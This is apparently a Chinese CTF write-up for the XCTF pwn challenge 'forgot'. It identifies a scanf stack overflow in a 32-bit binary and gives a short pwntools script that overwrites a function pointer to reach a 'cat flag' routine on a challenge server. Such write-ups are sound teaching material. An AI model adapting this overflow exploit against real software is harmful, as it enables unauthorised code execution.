攻防世界2

樊少泽2024-10-13 22:21

forgot

发现是32位文件

fgets(s, 32, stdin)限制读入32位字符,无法利用

__isoc99_scanf("%s", v2) 典型的栈溢出

发现cat flag

覆盖v2-v3,覆盖为cat flag的函数地址

exp:

python 复制代码 
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','56662')
door = 0x80486CC
io.recvuntil(b'>')
payload = b'aaaa'
io.sendline(payload)
io.recvuntil(b'>')
padding = b'a'*(0x74-0x54+0x4)
payload1 = padding + p32(door)
io.sendline(payload1)
io.interactive()
相关推荐
雪碧聊技术1 分钟前
4.CA证书的介绍?
运维·服务器
Web极客码4 分钟前
如何使用 Sugar Calendar 插件打造一个可销售活动门票的 WordPress 网站
运维·服务器
济6178 分钟前
ARM Linux 驱动开发篇---Linux 设备树简介-- Ubuntu20.04
linux·arm开发·嵌入式linux驱动开发
leblancAndSherry9 分钟前
阿里云轻量/ECS 实战:K3s + Helm + cert-manager + 云效 Codeup 全链路 CI/CD 落地(记录自用)
linux·运维·阿里云·ci/cd·kubernetes·云计算
czxyvX9 分钟前
008-Linux命令行参数和环境变量
linux
何中应11 分钟前
虚拟机内的系统无法解析外网域名
linux·运维·后端
红叶尽染寂绀蓝11 分钟前
已解决:同一ip下,Mac和Windows同时用vscode连接某个Linux远程服务器后,Mac再次连接时无法正确打开远程文件夹,由于转发设置导致
linux·服务器·windows·vscode·tcp/ip·macos
哈哈浩丶15 分钟前
LK(little kernel)2:官方LK的通用启动流程
linux·驱动开发
_OP_CHEN17 分钟前
【Linux系统编程】(三十四)初识进程信号:Linux 软中断的核心奥秘
linux·后端·操作系统·进程·信号·终端信号
热门推荐
01GitHub 镜像站点02从零搭建一个 PHP 登录注册系统(含完整源码)03使用 1panel面板 部署 php网站04MIUI显示/隐藏5G开关的方法,信号弱时开启手机Wifi通话方法05openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南06AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot07让你的代码更整洁:10 个必知的 Kotlin 扩展函数08Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services09如何解决 OpenClaw “Pairing required” 报错:两种官方解决方案详解10openclaw 配置飞书 报错 应用未建立长连接